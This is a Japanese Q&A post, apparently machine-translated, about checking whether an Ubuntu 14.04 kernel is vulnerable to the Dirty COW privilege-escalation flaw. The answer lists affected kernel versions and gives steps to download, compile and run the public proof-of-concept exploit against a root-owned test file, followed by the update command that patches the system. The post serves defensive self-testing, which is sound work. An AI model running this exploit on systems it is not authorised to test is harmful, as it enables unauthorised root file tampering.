私のシステムはUbuntu 14.04LTSです。uname -rv
以下を考慮すると
4.4.0-45-generic #66~14.04.1-Ubuntu SMP Wed Oct 19 15:05:38 UTC 2016.
私のシステムに「ダーティカウ」の問題に対するパッチが適用されているかどうかはどうすればわかりますか?
そうでなければ、どのように解決できますか?
ソフトウェアアップデートを実行しましたが、アップデートが見つかりませんでした。
ベストアンサー1
次の以前のバージョンはすべて影響を受けます。
4.8.0-26.28 for Ubuntu 16.10
4.4.0-45.66 for Ubuntu 16.04 LTS
3.13.0-100.147 for Ubuntu 14.04 LTS
3.2.0-113.155 for Ubuntu 12.04 LTS
3.16.36-1+deb8u2 for Debian 8
3.2.82-1 for Debian 7
4.7.8-1 for Debian unstable
システムをテストする必要がある場合は、PoCをダウンロードしてコンパイルできます。
curl https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c > dirtyc0w.c
〜のように根foo
ファイルを生成します。
sudo -s
echo This is a TEST > foo
確認する:
ls -l foo
〜のようにユーザーランニング:
gcc -pthread dirtyc0w.c -o dirtyc0w
./dirtyc0w foo m00000000000000000
ファイルがfoo
変更されていることを確認してください。
あなたがこれを得るならば:
cat foo
:
m00000000000000000
あなたは脆弱です。
ファイルが変更されていない場合:This is a TEST
>>安全です。
システムにパッチを適用するには:
sudo apt-get update && sudo apt-get dist-upgrade